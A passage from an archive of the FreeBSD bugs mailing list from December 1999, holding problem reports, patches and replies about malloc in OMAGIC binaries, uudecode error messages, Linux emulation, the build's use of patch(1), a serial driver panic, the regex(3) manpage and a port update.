48DDE14C82 for ; Sat, 18 Dec 1999 17:50:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA54409; Sat, 18 Dec 1999 17:50:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Sat, 18 Dec 1999 17:50:03 -0800 (PST) Message-Id: <199912190150.RAA54409@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Garrett Wollman Subject: kern/15554: malloc fails in OMAGIC programs Reply-To: Garrett Wollman Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/15554; it has been noted by GNATS. From: Garrett Wollman To: dm@reeducation-labor.lcs.mit.edu Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: kern/15554: malloc fails in OMAGIC programs Date: Sat, 18 Dec 1999 20:48:34 -0500 (EST) < % cc -static -N -o badomagic badomagic.c > % ./badomagic > malloc failed > Cannot allocate memory It appears that either malloc or execve is getting confused by the fact that the entire program is in a single load segment. Unless you demonstrate that this can cause a panic, I suspect the answer is ``don't do that, then''. For comparison: wollman@khavrinen$ cc -static -N foo.c wollman@khavrinen$ ./a.out malloc failed \^@Cannot allocate memory wollman@khavrinen$ cc -static -N -aout foo.c wollman@khavrinen$ ./a.out bash: ./a.out: cannot execute binary file -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Dec 18 19:20: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 78476150DA for ; Sat, 18 Dec 1999 19:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id TAA60042; Sat, 18 Dec 1999 19:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from katroo.Sendmail.COM (katroo.Sendmail.COM [206.189.75.90]) by hub.freebsd.org (Postfix) with ESMTP id 96159150E2 for ; Sat, 18 Dec 1999 19:10:11 -0800 (PST) (envelope-from ca@sendmail.com) Received: from wiz.Sendmail.COM (wiz.Sendmail.COM [10.210.100.97]) by katroo.Sendmail.COM (8.9.3/8.9.3) with ESMTP id TAA14086 for ; Sat, 18 Dec 1999 19:10:11 -0800 (PST) Received: (from ca@localhost) by wiz.Sendmail.COM (8.10.0.Beta2/8.10.0.Beta2) id dBJ3ABa87499; Sat, 18 Dec 1999 19:10:11 -0800 (PST) (with TLS:::: AUTH::) Message-Id: <199912190310.dBJ3ABa87499@wiz.Sendmail.COM> Date: Sat, 18 Dec 1999 19:10:11 -0800 (PST) From: ca+freebsd@zardoc.endmail.org Reply-To: ca+freebsd@zardoc.endmail.org To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: misc/15555: some enhancements for uudecode Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15555 >Category: misc >Synopsis: some enhancements for uudecode >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sat Dec 18 19:20:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Claus Assmann >Release: FreeBSD 3.2-RELEASE i386 >Organization: Endmail, Org. >Environment: Any(?) FreeBSD version (3.2, 3.3) >Description: uudecode isn't very helpful in it's error reports: It doesn't mention the source file if a destination file is to be overridden, nor does it mention the line where an out-of-range characters occurs. >How-To-Repeat: [Not provided] >Fix: Patch: --- /usr/src/usr.bin/uudecode/uudecode.c Sun Aug 29 08:34:23 1999 +++ uudecode.c Sat Dec 18 19:47:25 1999 @@ -97,7 +97,6 @@ argc -= optind; argv += optind; - if (*argv) { rval = 0; do { @@ -141,11 +140,10 @@ struct passwd *pw; register int n; register char ch, first, *p; - int mode, n1; + int mode, n1, l; char buf[MAXPATHLEN]; char buffn[MAXPATHLEN]; /* file name buffer */ - /* search for header line */ do { if (!fgets(buf, sizeof(buf), stdin)) { @@ -198,7 +196,8 @@ else { if (iflag && !access(buf, F_OK)) - (void)fprintf(stderr, "not overwritten: %s\n", buf); + (void)fprintf(stderr, "%s: not overwritten: %s\n", + filename, buf); if (!freopen(buf, "w", stdout) || fchmod(fileno(stdout), mode&0666)) { warn("%s: %s", buf, filename); @@ -208,7 +207,7 @@ strcpy(buffn, buf); /* store file name from header line */ /* for each input line */ - for (;;) { + for (l = 0;; l++) { if (!fgets(p = buf, sizeof(buf), stdin)) { warnx("%s: short file", filename); return(1); @@ -220,8 +219,8 @@ #define OUT_OF_RANGE \ { \ warnx( \ -"\n\tinput file: %s\n\tencoded file: %s\n\tcharacter out of range: [%d-%d]", \ - filename, buffn, 1 + ' ', 077 + ' ' + 1); \ +"\n\tinput file: %s\n\tencoded file: %s\n\tcharacter out of range: [%d-%d] at %d", \ + filename, buffn, 1 + ' ', 077 + ' ' + 1, l); \ return(1); \ } >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 19 0:50:32 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from ns11.rim.or.jp (ns11.rim.or.jp [202.247.130.230]) by hub.freebsd.org (Postfix) with ESMTP id DD1C5151EE; Sun, 19 Dec 1999 00:50:29 -0800 (PST) (envelope-from kumabu@t3.rim.or.jp) Received: from rayearth.rim.or.jp (rayearth.rim.or.jp [202.247.130.242]) by ns11.rim.or.jp (8.8.8/3.5Wpl2-ns11/RIMNET-2) with ESMTP id RAA13893; Sun, 19 Dec 1999 17:50:28 +0900 (JST) Received: (from uucp@localhost) by rayearth.rim.or.jp (8.8.8/3.5Wpl2-uucp1/RIMNET) with UUCP id RAA12640; Sun, 19 Dec 1999 17:50:28 +0900 (JST) Received: from localhost (localhost [127.0.0.1]) by red.snark.rim.or.jp (8.9.3/3.5Wpl7-98011205) with ESMTP id RAA78972; Sun, 19 Dec 1999 17:24:20 +0900 (JST) To: gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: i386/15553: Linux Emulation don't emulate accept(2) exactly In-Reply-To: Your message of "Sat, 18 Dec 1999 13:30:00 -0800 (PST)" <199912182130.NAA38938@freefall.freebsd.org> References: <199912182130.NAA38938@freefall.freebsd.org> Mime-Version: 1.0 From: "Shin'ya Kumabuchi" X-Mailer: Mew version 1.93 on Emacs 20.3 / Mule 4.0 (HANANOEN) Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: <19991219172420A.kumabu@t3.rim.or.jp> Date: Sun, 19 Dec 1999 17:24:20 +0900 X-Dispatcher: imput version 980905(IM100) Lines: 22 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I reported this PR. I'm sorry I wrote incorrect explanation in some section. How-To-Repeat: // read() causes Exception on Linux Emulation, // if no available data has received sock.getInputStream().read(); -> At first time read() blocks anyway. But once data recieved, read() causes Exception when no more data available. Fix: not fp->f_flag = O_RDWR; but fp->f_flag = FREAD | FWRITE; regards. -- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 19 1:49:17 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from mailman.zeta.org.au (mailman.zeta.org.au [203.26.10.16]) by hub.freebsd.org (Postfix) with ESMTP id 0FB8915145; Sun, 19 Dec 1999 01:49:14 -0800 (PST) (envelope-from bde@zeta.org.au) Received: from bde.zeta.org.au (beefcake.zeta.org.au [203.26.10.12]) by mailman.zeta.org.au (8.8.7/8.8.7) with ESMTP id UAA30661; Sun, 19 Dec 1999 20:49:02 +1100 Date: Sun, 19 Dec 1999 20:48:45 +1100 (EST) From: Bruce Evans X-Sender: bde@alphplex.bde.org To: "Stephen J. Roznowski" Cc: freebsd-bugs@FreeBSD.ORG, marcel@FreeBSD.ORG Subject: Re: Problem building -current (gnu/usr.bin/binutils/doc) In-Reply-To: <199912150353.WAA15571@cc158233-a.catv1.md.home.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 14 Dec 1999, Stephen J. Roznowski wrote: >... > patch -b .orig < /usr/src/gnu/usr.bin/binutils/doc/inc-hist.diff > patch: **** can't find file `.orig' : No such file or directory > *** Error code 2 > I was able to track this problem down to having ports/patch installed > (/usr/local/bin/patch) and my build was picking up this version of patch > vice the /usr/bin/patch one.... Perhaps "make buildworld" should specify > a PATH variable? It does, but since patch(1) is no longer a build-tool, an old version of patch(1) in $PATH is found instead of a tool in $STRICTTMPPATH. "-b .orig" is used to avoid pollution in the environment (I use SIMPLE_BACKUP_PREFIX="~"). It might be better to kill most of the environment. Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 19 3:20: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8153415077 for ; Sun, 19 Dec 1999 03:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA86195; Sun, 19 Dec 1999 03:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Sun, 19 Dec 1999 03:20:02 -0800 (PST) Message-Id: <199912191120.DAA86195@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Alexander Langer Subject: Re: kern/15532: Reboot just to kill a print job? Reply-To: Alexander Langer Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/15532; it has been noted by GNATS. From: Alexander Langer To: Juergen Lock Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: kern/15532: Reboot just to kill a print job? Date: Sun, 19 Dec 1999 12:11:55 +0100 Also sprach Juergen Lock (nox@jelal.kn-bremen.de): > > > old :), killed the job and powecycled the printer (there's no other > > > way to reset it i believe), but when i then sent the job again the > > > printer only got garbage. so i had to hit offline again... > > Yes, that happens to me every time I get those problems. > Sounds like you get paper jam often? (What printer is that?) HP Laserjet 4, but I sometimes use print to both pages, and if the page has been printed already ones paper jams occur often. It's the bad paper that makes these appear. > > Also try booting the machine while the printer prints. The same > > result. > Oh. even if you reset the printer too? Can't remember. > Hmm. Does that also help when the filter still hangs blocking on > the printer device like in my case, with no signal being able to > kill it? Somehow i doubt it... Yes, I doubt it, too. Alex To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 19 3:51:29 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from post.mail.nl.demon.net (post-10.mail.nl.demon.net [194.159.73.20]) by hub.freebsd.org (Postfix) with ESMTP id 4C3E715059; Sun, 19 Dec 1999 03:51:21 -0800 (PST) (envelope-from marcel@scc.nl) Received: from [212.238.132.94] (helo=scones.sup.scc.nl) by post.mail.nl.demon.net with esmtp (Exim 2.02 #1) id 11zers-0003bX-00; Sun, 19 Dec 1999 11:51:16 +0000 Received: from scc.nl (scones.sup.scc.nl [192.168.2.4]) by scones.sup.scc.nl (8.9.3/8.9.3) with ESMTP id MAA42881; Sun, 19 Dec 1999 12:51:12 +0100 (CET) (envelope-from marcel@scc.nl) Message-ID: <385CC6B0.F14A86B0@scc.nl> Date: Sun, 19 Dec 1999 12:51:12 +0100 From: Marcel Moolenaar Organization: SCC vof X-Mailer: Mozilla 4.7 [en] (X11; I; Linux 2.2.5 i386) X-Accept-Language: en MIME-Version: 1.0 To: Bruce Evans Cc: "Stephen J. Roznowski" , freebsd-bugs@FreeBSD.ORG, marcel@FreeBSD.ORG Subject: Re: Problem building -current (gnu/usr.bin/binutils/doc) References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Bruce Evans wrote: > > On Tue, 14 Dec 1999, Stephen J. Roznowski wrote: > > >... > > patch -b .orig < /usr/src/gnu/usr.bin/binutils/doc/inc-hist.diff > > patch: **** can't find file `.orig' : No such file or directory > > *** Error code 2 > > > I was able to track this problem down to having ports/patch installed > > (/usr/local/bin/patch) and my build was picking up this version of patch > > vice the /usr/bin/patch one.... Perhaps "make buildworld" should specify > > a PATH variable? > > It does, but since patch(1) is no longer a build-tool, an old version of > patch(1) in $PATH is found instead of a tool in $STRICTTMPPATH. I've already been thinking about setting PATH to some fixed default, especially to solve the problems people may have when /usr/local/bin is before /usr/bin for example (and as is in this example). > "-b .orig" is used to avoid pollution in the environment (I use > SIMPLE_BACKUP_PREFIX="~"). It might be better to kill most of the > environment. Hmmm... is forcing `.orig' as the suffix not against POLA? I mean, if someone has SIMPLE_BACKUP_PREFIX in his/her environment, then he/she expects to find a backup file with that prefix. The makefile can easily be rewritten as (with cut-n-paste corruption): Index: Makefile =================================================================== RCS file: /home/ncvs/src/gnu/usr.bin/binutils/doc/Makefile,v retrieving revision 1.3 diff -u -r1.3 Makefile --- Makefile 1999/08/27 23:34:46 1.3 +++ Makefile 1999/12/19 11:48:01 @@ -13,12 +13,14 @@ INFOENTRY_ld= "* Ld: (ld). The GNU linker." INFOENTRY_annotate= "* GDB annotation: (annotate). Annotations for the GNU Debugger (GDB)." +SIMPLE_BACKUP_PREFIX?= ".orig" + MAKEINFOFLAGS+= --no-validate MAKEINFOFLAGS+= -I ${SRCDIR}/gas/doc -I ${SRCDIR}/ld -I ${SRCDIR}/bfd/doc MAKEINFOFLAGS+= -I ${GDBDIR}/gdb/doc MAKEINFOFLAGS+= -I ${CONTRIBDIR}/libreadline/doc -CLEANFILES= gdb-cfg.texi inc-hist.texi inc-hist.texi.orig +CLEANFILES= gdb-cfg.texi inc-hist.texi inc-hist.texi.${SIMPLE_BACKUP_PREFIX} as.info: as.texinfo asconfig.texi c-i386.texi ld.info: ld.texinfo bfdsumm.texi @@ -32,6 +34,6 @@ .PATH: ${CONTRIBDIR}/libreadline/doc inc-hist.texi: hsuser.texinfo inc-hist.diff cp ${.ALLSRC:M*.texinfo} ${.TARGET} - patch -b .orig < ${.ALLSRC:M*.diff} + patch -b ${SIMPLE_BACKUP_PREFIX} < ${.ALLSRC:M*.diff} .include or with the last lines as: + SIMPLE_BACKUP_PREFIX=${SIMPLE_BACKUP_PREFIX} \ patch < ${.ALLSRC:M*.diff} .include -- Marcel Moolenaar mailto:marcel@scc.nl SCC Internetworking & Databases http://www.scc.nl/ The FreeBSD project mailto:marcel@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 19 4:50: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 63B0714BF2 for ; Sun, 19 Dec 1999 04:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id EAA93066; Sun, 19 Dec 1999 04:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Sun, 19 Dec 1999 04:50:02 -0800 (PST) Message-Id: <199912191250.EAA93066@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Poul-Henning Kamp Subject: Re: kern/15554: malloc fails in OMAGIC programs Reply-To: Poul-Henning Kamp Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/15554; it has been noted by GNATS. From: Poul-Henning Kamp To: dm@reeducation-labor.lcs.mit.edu Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: kern/15554: malloc fails in OMAGIC programs Date: Sun, 19 Dec 1999 13:41:11 +0100 This looks like a toolchain problem somehow: 173 ktrace RET ktrace 0 173 ktrace CALL execve(0xbfbffd6f,0xbfbffcb0,0xbfbffcb8) 173 ktrace NAMI "./a" 173 a RET execve 0 173 a CALL readlink(0x804a6d4,0xbfbffbb4,0x3f) 173 a NAMI "/etc/malloc.conf" 173 a RET readlink -1 errno 2 No such file or directory 173 a CALL mmap(0,0x1000,0x3,0x1002,0xffffffff,0,0,0) 173 a RET mmap 536870912/0x20000000 173 a CALL break(0x804c000) 173 a RET break -1 errno 12 Cannot allocate memory syv# !107 cc -static -N -o a a.c syv# nm -n a | head U _DYNAMIC 08048074 ? _init 0804807c T _start 08048160 t gcc2_compiled. 08048160 T main 08048234 T atexit 080482e4 T strlen 080482fc W __error 080482fc T __error_unthreaded 08048310 T _write [...] I thought programs started out at 0x0 or at least close to zero ? -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 19 5:31:40 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from mailman.zeta.org.au (mailman.zeta.org.au [203.26.10.16]) by hub.freebsd.org (Postfix) with ESMTP id 92F0014E27 for ; Sun, 19 Dec 1999 05:31:35 -0800 (PST) (envelope-from bde@zeta.org.au) Received: from bde.zeta.org.au (beefcake.zeta.org.au [203.26.10.12]) by mailman.zeta.org.au (8.8.7/8.8.7) with ESMTP id AAA05114; Mon, 20 Dec 1999 00:31:16 +1100 Date: Mon, 20 Dec 1999 00:30:58 +1100 (EST) From: Bruce Evans X-Sender: bde@alphplex.bde.org To: "John J. Rushford Jr." Cc: freebsd-bugs@FreeBSD.ORG Subject: Re: smp and cy driver In-Reply-To: <199912160341.UAA22574@sapphire.alisa.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 15 Dec 1999, John J. Rushford Jr. wrote: > I've just recently installed a Cyclades YeP multiports card > on a FreeBSD 3.2 system with an SMP kernel, Dual PII's. > Anyway, the kernel panics with the external ports box plugged > into the PCI card and with the cy driver enabled. > > I finally found that if I re-compile the kernel without SMP > support, that the YeP card and cy driver are fully functional. This is supposed to be fixed in FreeBSD-3.3 (in cy.c rev.1.83.2.2 (1999/06/04)). Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 19 6:58: 1 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from mailman.zeta.org.au (mailman.zeta.org.au [203.26.10.16]) by hub.freebsd.org (Postfix) with ESMTP id 5D05B14C83; Sun, 19 Dec 1999 06:57:57 -0800 (PST) (envelope-from bde@zeta.org.au) Received: from bde.zeta.org.au (beefcake.zeta.org.au [203.26.10.12]) by mailman.zeta.org.au (8.8.7/8.8.7) with ESMTP id BAA07267; Mon, 20 Dec 1999 01:57:42 +1100 Date: Mon, 20 Dec 1999 01:57:24 +1100 (EST) From: Bruce Evans X-Sender: bde@alphplex.bde.org To: Marcel Moolenaar Cc: "Stephen J. Roznowski" , freebsd-bugs@FreeBSD.ORG, marcel@FreeBSD.ORG Subject: Re: Problem building -current (gnu/usr.bin/binutils/doc) In-Reply-To: <385CC6B0.F14A86B0@scc.nl> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 19 Dec 1999, Marcel Moolenaar wrote: > > "-b .orig" is used to avoid pollution in the environment (I use > > SIMPLE_BACKUP_PREFIX="~"). It might be better to kill most of the > > environment. > > Hmmm... is forcing `.orig' as the suffix not against POLA? I mean, if It doesn't matter in a temporary directory. > someone has SIMPLE_BACKUP_PREFIX in his/her environment, then he/she > expects to find a backup file with that prefix. The makefile can easily > be rewritten as (with cut-n-paste corruption): Not so easily. The user's SIMPLE_BACKUP_PREFIX may change, so setting CLEANFILES is problematic. > Index: Makefile > ... > -CLEANFILES= gdb-cfg.texi inc-hist.texi inc-hist.texi.orig > +CLEANFILES= gdb-cfg.texi inc-hist.texi This just breaks CLEANFILES. "inc-hist.text*" would risk clobbering the source file inc-hist.texi (but is safe here because the source file is in another directory). Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 19 7:10: 9 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2D76B14E62 for ; Sun, 19 Dec 1999 07:10:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA53862; Sun, 19 Dec 1999 07:10:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from jerry.kfunigraz.ac.at (GIGAJERRY.kfunigraz.ac.at [143.50.55.161]) by hub.freebsd.org (Postfix) with ESMTP id 3A81314E1D for ; Sun, 19 Dec 1999 07:08:48 -0800 (PST) (envelope-from mkamm@tom.kfunigraz.ac.at) Received: from tom.kfunigraz.ac.at (mc_tom [10.10.1.160]) by jerry.kfunigraz.ac.at (8.9.3/8.9.3) with ESMTP id QAA06593 for ; Sun, 19 Dec 1999 16:08:41 +0100 (MET) Received: from localhost.kfunigraz.ac.at (BONLINEB84.kfunigraz.ac.at [143.50.33.84]) by tom.kfunigraz.ac.at (8.9.3/8.9.3) with ESMTP id QAA01100 for ; Sat, 18 Dec 1999 16:19:41 +0100 (MET) Received: (from mkamm@localhost) by localhost.kfunigraz.ac.at (8.9.3/8.9.3) id LAA01044; Sat, 18 Dec 1999 11:38:09 +0100 (CET) (envelope-from mkamm) Message-Id: <199912181038.LAA01044@localhost.kfunigraz.ac.at> Date: Sat, 18 Dec 1999 11:38:09 +0100 (CET) From: mkamm@gmx.net Reply-To: mkamm@gmx.net To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/15561: regex(3) manpage needs update Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15561 >Category: bin >Synopsis: regex(3) manpage needs update >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: doc-bug >Submitter-Id: current-users >Arrival-Date: Sun Dec 19 07:10:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Martin Kammerhofer >Release: FreeBSD 3.4-RC i386 >Organization: Graz Universities >Environment: >Description: The BUGS section of regex(3) starts with... BUGS This is an alpha release with known defects. Please report problems. There is one known functionality bug. The implementation of internationalization is incomplete: the locale is always assumed to be the default one of 1003.2, and only the collating elements etc. of that locale are available. Paragraph 1 is questionable. There have been several commits in /src/lib/libc/regex over the past 5 years. Why is it still alpha? The bug listed in paragraph 2 above seems to have been fixed by ache with several commits (from version 1.5 on) to regcomp.c >How-To-Repeat: echo _aeiou_äöüß_ | env LANG=de_DE.ISO_8859-1 sed 's/[^[:alpha:]]/=/g' echo _aeiou_äöüß_ | env - sed 's/[^[:alpha:]]/=/g' >Fix: Correct bugs section of regex(3). >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 19 7:50: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D727015145 for ; Sun, 19 Dec 1999 07:50:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA57196; Sun, 19 Dec 1999 07:50:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id C216614D98; Sun, 19 Dec 1999 07:40:41 -0800 (PST) Message-Id: <19991219154041.C216614D98@hub.freebsd.org> Date: Sun, 19 Dec 1999 07:40:41 -0800 (PST) From: rod@zort.on.ca To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: misc/15565: x11-toolkits/rep-gtk updated Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15565 >Category: misc >Synopsis: x11-toolkits/rep-gtk updated >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Dec 19 07:50:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Rod Taylor >Release: >Organization: Zort >Environment: >Description: updated for the sake of sawmill (also stored archive in second place due to the author removing old copies.) >How-To-Repeat: >Fix: diff -ruN rep-gtk.old/Makefile rep-gtk/Makefile --- rep-gtk.old/Makefile Sun Dec 19 10:29:56 1999 +++ rep-gtk/Makefile Sun Dec 19 10:30:52 1999 @@ -6,9 +6,10 @@ # $FreeBSD: ports/x11-toolkits/rep-gtk/Makefile,v 1.2 1999/12/02 06:48:19 nakai Exp $ # -DISTNAME= rep-gtk-0.6 +DISTNAME= rep-gtk-0.7 CATEGORIES= x11-toolkits -MASTER_SITES= ftp://ftp.dcs.warwick.ac.uk/people/John.Harper/librep/ +MASTER_SITES= ftp://ftp.dcs.warwick.ac.uk/people/John.Harper/librep/ \ + http://www.oscentral.org/files/software/ MAINTAINER= nakai@FreeBSD.org diff -ruN rep-gtk.old/files/md5 rep-gtk/files/md5 --- rep-gtk.old/files/md5 Sun Dec 19 10:29:55 1999 +++ rep-gtk/files/md5 Sun Dec 19 10:30:30 1999 @@ -1 +1 @@ -MD5 (rep-gtk-0.6.tar.gz) = efdedd97df1aec077194ffb2fc77bf9d +MD5 (rep-gtk-0.7.tar.gz) = f3e774339ccf40ee973c350083bb2a55 diff -ruN rep-gtk.old/patches/patch-ab rep-gtk/patches/patch-ab --- rep-gtk.old/patches/patch-ab Sun Dec 19 10:29:55 1999 +++ rep-gtk/patches/patch-ab Wed Dec 31 19:00:00 1969 @@ -1,13 +0,0 @@ ---- gdk-1.2.defs.orig Thu Sep 9 00:42:39 1999 -+++ gdk-1.2.defs Thu Nov 11 17:49:27 1999 -@@ -454,6 +454,10 @@ - (GdkFont (copy #f)) - ((string name))) - -+(define-func gdk_fontset_load -+ (GdkFont (copy #f)) -+ ((string name))) -+ - (define-func gdk_flush - none - ()) diff -ruN rep-gtk.old/patches/patch-ad rep-gtk/patches/patch-ad --- rep-gtk.old/patches/patch-ad Sun Dec 19 10:29:55 1999 +++ rep-gtk/patches/patch-ad Wed Dec 31 19:00:00 1969 @@ -1,20 +0,0 @@ ---- rep-gtk.c.orig Thu Oct 21 01:59:21 1999 -+++ rep-gtk.c Thu Nov 11 17:50:32 1999 -@@ -1805,7 +1805,7 @@ - return color; - } - --extern repv Fgdk_font_load (repv font); -+extern repv Fgdk_fontset_load (repv font); - - repv - sgtk_font_conversion (repv font) -@@ -1814,7 +1814,7 @@ - - if (rep_STRINGP (font)) - { -- font = Fgdk_font_load (font); -+ font = Fgdk_fontset_load (font); - if (font == Qnil) - Fsignal (Qerror, rep_list_2 (rep_string_dup ("no such font: "), - orig_font)); >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 19 8: 2:41 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 38EEA15187; Sun, 19 Dec 1999 08:02:40 -0800 (PST) (envelope-from roberto@FreeBSD.org) Received: (from roberto@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA57832; Sun, 19 Dec 1999 08:02:40 -0800 (PST) (envelope-from roberto@FreeBSD.org) Date: Sun, 19 Dec 1999 08:02:40 -0800 (PST) From: Message-Id: <199912191602.IAA57832@freefall.freebsd.org> To: Martin.Birgmeier@aon.at, roberto@FreeBSD.org, freebsd-bugs@FreeBSD.org, roberto@FreeBSD.org Subject: Re: bin/9374: Improved functionality for find(1) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Improved functionality for find(1) State-Changed-From-To: open->feedback State-Changed-By: roberto State-Changed-When: Sun Dec 19 08:02:02 PST 1999 State-Changed-Why: Feedback requested for merging within CURRENT. Responsible-Changed-From-To: freebsd-bugs->roberto Responsible-Changed-By: roberto Responsible-Changed-When: Sun Dec 19 08:02:02 PST 1999 Responsible-Changed-Why: I'm taking this PR. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 19 8:40: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by 